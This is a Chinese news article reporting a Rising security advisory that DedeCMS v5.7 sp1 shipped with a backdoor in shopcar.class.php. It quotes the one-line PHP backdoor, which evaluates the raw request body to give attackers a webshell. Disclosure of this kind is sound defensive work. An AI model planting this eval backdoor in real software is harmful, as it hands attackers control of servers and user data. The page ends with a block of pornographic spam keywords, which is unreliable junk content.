返回頂部
關(guān)閉軟件導(dǎo)航
位置:首頁(yè) > 資訊 > 織夢(mèng)新聞>織夢(mèng)CMS系統(tǒng)現(xiàn)后門70萬(wàn)網(wǎng)站資料恐不保
  

  【IT168資訊】瑞星公司今日對(duì)外發(fā)布緊急警示:國(guó)內(nèi)知名的PHP開源網(wǎng)站管理系統(tǒng)——織夢(mèng)CMS(DedeCms)v5.7 sp1版本被發(fā)現(xiàn)植入后門,黑客可通過(guò)此后門直接獲得網(wǎng)站的控制權(quán)限,獲取存儲(chǔ)在服務(wù)器上的文件和數(shù)據(jù)庫(kù)。據(jù)CMS官方數(shù)據(jù)顯示,目前約有70萬(wàn)網(wǎng)站使用該系統(tǒng)搭建織夢(mèng)文章批量自動(dòng)上傳助手,涉及企業(yè)、政府機(jī)關(guān)、媒體機(jī)構(gòu)、行業(yè)及個(gè)人網(wǎng)站等。瑞星公司特此緊急提醒使用該系統(tǒng)的網(wǎng)站管理員織夢(mèng)批量更新 ,使用瑞星網(wǎng)站密碼安全檢測(cè)系統(tǒng)查找后門并及時(shí)進(jìn)行封堵。

  

  據(jù)專家介紹,織夢(mèng)CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過(guò)利用這個(gè)后門織夢(mèng)軟件采集,黑客只需要構(gòu)造簡(jiǎn)單的數(shù)據(jù)包提交到服務(wù)器,就能夠獲取到該網(wǎng)站的WebShell,通過(guò)對(duì)服務(wù)器進(jìn)一步滲透攻擊,進(jìn)而獲取服務(wù)器的最高權(quán)限。

  

  織夢(mèng)CMS系統(tǒng)現(xiàn)后門70萬(wàn)網(wǎng)站資料恐不保

  

  ▲CMS中被植入的后門代碼

  

  在黑客攻陷網(wǎng)站后,便可以直接訪問(wèn)服務(wù)器上的文件、數(shù)據(jù)庫(kù)等信息。目前我國(guó)有大量網(wǎng)站采用該系統(tǒng),此后門或?qū)?dǎo)致大量用戶的信息泄露,造成極為嚴(yán)重的影響。

如果您覺(jué)得 織夢(mèng)CMS系統(tǒng)現(xiàn)后門70萬(wàn)網(wǎng)站資料恐不保 這篇文章對(duì)您有用,請(qǐng)分享給您的好友,謝謝
文章地址:http://www.meyanliao.com/article/dede/zmCMSxtxhmwwzzlkbb.html
解放雙手無(wú)盡可能,有問(wèn)題添加天線貓微信
主站蜘蛛池模板: 99久久无码一区人妻a黑| 熟妇人妻中文a∨无码| 色窝窝无码一区二区三区色欲 | 无码国产精品久久一区免费 | 亚洲不卡中文字幕无码| 中文有码无码人妻在线| 亚洲中文字幕无码永久在线| 国产AV无码专区亚洲AV蜜芽| 亚洲成a人片在线观看无码| 爽到高潮无码视频在线观看| 毛片免费全部播放无码| 亚洲欧洲美洲无码精品VA| 用舌头去添高潮无码视频| 亚洲精品无码久久久久秋霞| 日韩丰满少妇无码内射| 亚洲av永久无码精品秋霞电影影院 | 亚洲无码高清在线观看| 在线观看亚洲AV每日更新无码 | 亚洲精品久久久久无码AV片软件| 一本色道无码道在线| 国产精品无码一区二区在线| 精品无码日韩一区二区三区不卡| 国产精品无码午夜福利| 中文字幕无码日韩专区免费| 亚洲AV无码乱码在线观看性色扶| 亚洲日韩精品无码专区加勒比| 男人的天堂无码动漫AV| 人妻系列无码专区无码中出| 久久久久亚洲AV成人无码网站| 亚洲中文字幕久久精品无码喷水| 综合国产在线观看无码| 精品一区二区三区无码免费直播| 免费无码精品黄AV电影| 久久久久亚洲精品无码蜜桃| 久久国产精品无码HDAV| 无码人妻精品一区二区蜜桃| 亚洲AV成人无码网站| julia无码人妻中文字幕在线| 亚洲无码精品浪潮| 亚洲欧洲无码AV电影在线观看 | 日韩精品少妇无码受不了|